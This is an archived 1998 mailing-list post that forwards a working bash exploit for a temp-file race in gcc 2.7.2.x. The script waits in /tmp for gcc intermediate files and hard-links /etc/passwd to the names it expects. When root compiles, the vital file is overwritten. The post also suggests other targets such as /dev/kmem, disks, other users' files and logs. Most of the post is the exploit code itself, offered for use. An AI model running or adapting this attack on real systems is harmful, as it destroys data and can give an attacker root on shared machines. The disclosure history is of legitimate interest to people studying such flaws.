Sorry if this has already been mentioned, but it's an updated version anyways. NOT fun. NOT good. Unless you wanna drive a sysadmin nuts. ;P --begin gcc-exploit-2-- Try this. Launch it as a unprivledged user in background (screen?), then, as a root, try to compile any file or project using gcc (eg. typical daemon, service, client), and watch out your /etc/passwd (or any other vital file, eg. /dev/kmem, /dev/hda). Attached exploit is an improved version of that one I previously posted onto BUGTRAQ (yesterday). It's also possible to overwrite other user's files (if only he/she uses gcc occassionally), system logs etc. Vunerable platforms: any running gcc 2.7.2.x Compromise: overwriting files, maybe root; exploitable locally. -- cut here -- #!/bin/bash # [ http://www.rootshell.com ] 1/16/98 # Simple GCC exploit (tested under 2.7.2.3.f.1) # - by Michal Zalewski (lcamtufat_private) # --------------------------------------------- # Usage: "screen ./gcc_ln" then Ctrl+A,D # --------------------------------------------- # Ugh, blah... Should be written in C for # better performance, but I have no time :) VICTIM=/etc/passwd if [ ! -f $VICTIM ]; then echo "I can't see my victim ($VICTIM)..." exit 0 fi ORIG=`ls -l $VICTIM|awk '{print \$5}'` echo "GCC exploit launched against $VICTIM ($ORIG bytes)." renice +20 $PPID >&/dev/null cd /tmp while [ 1 ]; do V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."` if [ ! "$V" = "" ]; then ln $VICTIM ${V}.s &>/dev/null ln $VICTIM ${V}1.o &>/dev/null NOWY=`ls -l $VICTIM|awk '{print \$5}'` if [ "$ORIG" = "$NOWY" ]; then echo -n "." rm -f ${V}.s ${V}1.o &>/dev/null else echo "Voila. I'm so smart." rm -f ${V}.s ${V}1.o &>/dev/null exit 0 fi fi done --end gcc-exploit-2-- --Phillip R. Jaenke (prjat_private) Primary Developer, The Improvement Linux Project Core Team Member, The Cyberian RC5 Effort - http://www.cyberian.org/ AKA Kaeyerai (Rediscovery) of MasterTechnoMonster Maintainer, The Cleveland Modem Guide - http://web.raex.com/~prj/
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:39:54 PDT